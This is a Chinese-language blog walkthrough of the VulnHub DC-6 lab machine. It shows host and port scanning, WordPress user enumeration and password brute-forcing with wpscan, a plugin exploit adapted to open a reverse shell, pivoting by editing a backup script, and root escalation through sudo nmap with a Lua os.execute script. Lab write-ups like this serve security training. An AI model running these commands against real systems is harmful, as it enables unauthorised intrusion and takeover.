Vulnhub[DC6]

简介

image-20220701194033032

下载

信息收集

主机探活

kali中使用arp-scan进行主机探活

arp-scan --interface eth0 192.168.0.0/24 

image-20220701194418916

经过筛选可以知道192.168.0.141是DC-6的ip

端口扫描

nmap  -sC -sV -p- 192.168.0.141

image-20220701194442156

发现这里只是开了80、22端口

首先从80端口入手

image-20220701194527183

这和之前DC-2是一样的

返回一个错误页面,F12可以看到网页做了一个301永久重定向

修改hosts文件

image-20220701194757329

再次打开正常显示

image-20220701194843531

这里可以看出这又是一个wordpress的页面

然后页面显示的信息跟插件有关

这个题目在官网中还给了线索

image-20220701195403471

CLUE
好吧,这并不是一个真正的线索,但对于那些只想继续工作的人来说,更多的是一些“我们不想花五年时间等待某个过程完成”的建议。
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 这应该可以为您节省几年时间。 😉

这个线索之后有用的

然后我们还是常规先获取一下用户名

wpscan --url http://wordy/ -e u

image-20220704172304025

能够得到以上用户

image-20220704172402263

然后密码的话就要用到之前官网上给到的提示了

根据提示我们可以得到密码表

image-20220704172603098

然后通过用户名表和密码表爆破后台账号

wpscan --url http://wordy/ -U username.txt -P passwords.txt

image-20220704173139790

找到用户名和密码

登录后台

image-20220704173623004

登录成功,但是其他地方都没有发现有什么问题,但是这个使用了一个插件Activity monitor

渗透

使用msf搜索这个插件

searchsploit activity monitor

image-20220704174119658

这里我们使用第三个

cp /usr/share/exploitdb/exploits/php/webapps/45274.html .

这里我们需要修改的是请求地址和反弹shell的地址

image-20220704174401136

然后python开启http服务并且还要监听9999端口

image-20220704174552539

image-20220704174605819

然后访问127.0.0.1

image-20220704174700176

点击请求

image-20220704174815533

反弹shell成功

然后用python转换成标准的shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20220704175058074

然后在home目录下可以看到四个用户

image-20220704175221328

然后在mark的stuff目录下找到了一个things-to-do.txt文件

image-20220704175540027

这里有graham的密码

我们ssh登录graham

image-20220704175647005

查看当前用户可以执行的操作,发现可以运行jens用户下面的backups.sh

image-20220704175919857

查看backups.sh文件,发现是对web的文件进行打包备份image-20220704180154725

向backups.sh文件中写入”/bin/bash”,并以jens用户去执行该脚本

image-20220704180351752

脚本执行完成后,可以发现切换到jens用户了

提权

再次查看jens可以执行的操作,发现jens可以在无密码情况下使用nmap命令

image-20220704180413284

这里其实也还有个提示

image-20220704180847699

写入一条命令到getShell,通过nmap运行getShell成功进入root用户

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

image-20220704181038111

提权成功

cd ~
cat theflag.txt

image-20220704181220878

posted @ 2022-07-04 18:18  Townmacro  阅读(64)  评论(0编辑  收藏  举报